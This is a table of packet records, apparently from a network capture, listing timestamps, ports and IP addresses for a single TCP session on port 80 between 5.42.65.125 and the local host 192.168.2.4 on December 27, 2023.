Dec 27, 2023 18:12:24.438954115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438966036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438966990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.438980103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.439004898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.440480947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.440530062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.440541029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.440567017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.440568924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.440582037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.440594912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.440604925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.440629005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.442837954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.442874908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.442919970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.442930937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.442931890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.442943096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.442956924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.442976952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.442982912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.443870068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.443924904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.443967104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.443979979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.443989992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.444000006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.444005013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.444035053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.445818901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.445832968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.445871115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.445883989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.445883989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.445894957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.445909023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.445935965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.446295977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.446309090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.446319103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.446330070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.446340084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.446342945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.446360111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.446378946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.447118044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.447130919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.447168112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.447182894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.447210073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.447215080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.447227955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.447252989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.447269917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.448503971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.448517084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.448527098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.448560953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.448569059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.448580980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.448586941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.448611975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.448623896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.448970079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.449023008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.449035883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.449064016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.449112892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.449125051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.449136019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.449146986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.449167967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.449182034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.450378895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.450432062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.450453043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.450481892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.450494051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.450506926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.450509071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.450530052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.450556993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457071066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457210064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457222939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457233906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457246065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457257986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457268000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457268000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457279921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457292080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457303047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457319021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457343102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457355976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457385063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457396030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457396984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457432985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457441092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457453012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457479000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457509995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457828999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457842112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457880974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457902908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457916021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457926989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.457947016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.457986116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.458801985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.458867073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.458879948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.458890915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.458903074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.458921909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.458946943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.459980011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.459992886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460027933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460040092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460048914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.460051060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460067987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.460108042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.460508108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460568905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460585117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460597992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460613966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.460627079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.460642099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.460661888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.461452007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.461466074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.461509943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.461513996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.461522102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.461543083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.461549997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.461581945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.462368965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.462380886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.462430954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.462452888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.462466002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.462477922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.462503910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.462521076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.463437080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.463449955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.463460922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.463470936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.463481903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.463494062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.463537931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.464148998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.464164019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.464174986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.464185953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.464191914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.464196920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.464226961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.464253902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.465253115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.465265989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.465276003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.465305090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.465329885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.465337038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.465341091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.465380907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.465993881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466006041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466016054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466027021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466037989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466166019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.466828108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466840982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466851950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466862917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466875076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.466880083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.466907978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.466926098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.467633963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.467678070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.467681885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.467694998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.467705965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.467729092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.467739105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.467751980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.467777967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.468693018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.468707085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.468717098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.468745947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.468764067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.468770027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.468776941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.468811035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.471148014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.471160889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.471172094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.471184015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.471193075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.471194029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.471218109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.471235991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473088026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473100901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473145962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473150015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473161936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473174095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473198891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473210096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473229885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473241091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473253012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473263979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473274946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473274946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473285913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473292112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473297119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473315954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473342896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473361015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473372936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473382950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.473404884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.473424911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.474492073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.474540949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.474558115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.474570036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.474581003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.474592924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.474603891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.474632025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.475075006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.475087881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.475123882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.475168943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.475182056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.475192070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.475214005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.475234985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.475971937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.475984097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.475992918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.476003885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.476016045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.476018906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.476046085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.476058960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477096081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477134943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477143049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477150917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477161884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477183104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477205992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477262974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477273941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477765083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477809906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477828026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477868080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477870941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477880001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477907896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477924109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.477937937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.477977037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.478576899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.478621006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.478650093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.478660107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.478669882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.478681087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.478697062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.478712082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.479336023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.479381084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.479408979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.479419947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.479449034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.479454994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.479460955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.479490995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.479501009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.480359077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.480370045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.480381966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.480393887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.480403900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.480408907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.480416059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.480438948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.481043100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.481081009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.481086969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.481126070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.481127977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.481141090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.481152058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.481174946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.481194973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.481945038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.481957912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.481992006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.481996059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.482038021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.482069969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.482081890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.482115984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.482891083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.482903004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.482913971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.482925892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.482937098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.482938051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.482959032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.482973099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.483630896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.483643055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.483674049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.483678102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.483688116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.483690023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.483701944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.483716965 CET	49738	80	192.168.2.4	5.42.65.125
